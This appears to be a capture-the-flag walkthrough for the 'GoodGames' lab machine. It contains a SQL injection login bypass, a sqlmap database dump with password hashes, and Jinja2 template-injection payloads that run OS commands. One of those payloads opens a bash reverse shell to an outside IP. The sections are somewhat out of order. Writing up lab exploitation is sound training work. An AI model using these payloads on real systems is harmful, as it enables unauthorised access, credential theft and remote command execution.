┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.10.11.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 19:48 EDT
Nmap scan report for 10.10.11.130
Host is up (0.024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: goodgames.htb
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.88 seconds
Port 80
We have a SQL injection that allows us to bypass login.
Request
POST /login HTTP/1.1
Host: 10.10.11.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.10.11.130
Connection: close
Referer: http://10.10.11.130/
Upgrade-Insecure-Requests: 1
email=' or 1=1-- -&password=eeeee
Response
[STRIPPED]
<h1 class="text-main-1" style="font-size: 50px;">Login Successful</h1>
<div class="nk-gap"></div>
<h2 class="h4">Welcome admintest</h2>
<div>Redirecting you to profile page...</div>
<div class="nk-gap-3"></div>
[STRIPPED]
With union we can actually dump some interesting things: email=' union select 1,2,3,database()-- -&password=eeeee
the current database is main
We can just save the request in a file and use sqlmap to dump the db
Save it as request and then we just have to pass it to sqlmap this way sqlmap -r request -p email I manually with burp repeater saw tha the database name was main so I can dump it this way sqlmap -r request -p email --dump -D main
SQLmap results
We get the admin hash this way!
+----+-------+---------------------+----------------------------------+
| id | name | email | password |
+----+-------+---------------------+----------------------------------+
| 1 | admin | admin@goodgames.htb | 2b22337f218b2d82dfc3b6f77e7cb8ec |
| 2 | test | test@test.com | 098f6bcd4621d373cade4e832627b4f6 |
+----+-------+---------------------+----------------------------------+
We put the hash in crackstation and get the password this way superadministrator
These slides are also quite helpful, if we try this payload we get the "id" and we are root right away name={{ namespace.__init__.__globals__.os.popen('id').read() }}
Lets grab the flags name={{ namespace.__init__.__globals__.os.popen('cat /home/augustus/user.txt').read() }}
I can not grab the root flag.
Let's try to get a shell
We got a shell from the web application (not burp) using this paylaod {{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.3/5555 0>&1"').read() }}
Then we upgraded our shell
script /dev/null -c bash
ctrl Z
stty raw -echo; fg
reset
OR
python -c 'import pty; pty.spawn("/bin/bash")'
Than we can make a ping sweep to look for where is the reak machine as we are in a docker container (hence the docker file in the folder)
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
if we ssh with augustus and the same password on 172.19.0.1 we get a user shell
Privesc
So we are in 2 env one in a docker with root rights and one in the actual machine with just user rights, let's abuse this to our advantage.
Take another reverse shell to the docker (now we have 2 shells)
Now in our profile page we have settings, it requires de change the /etc/host file though 10.10.11.130 internal-administration.goodgames.htb This page has another login thoug so we need to try to dump some data with SQLi
In burp we right click on a request (without sql injection) save item
Using the password we can now login to volt
After a look on the platform we can interact in the settings and modify the full name
So this is an injection point with something actually reflected to us. If we look for common flask exploitation we can find an article about SSTI If we try the first paylaod mentioned in the article using burp repeater it seems to work:
We can see that {{7*7}} gives 49
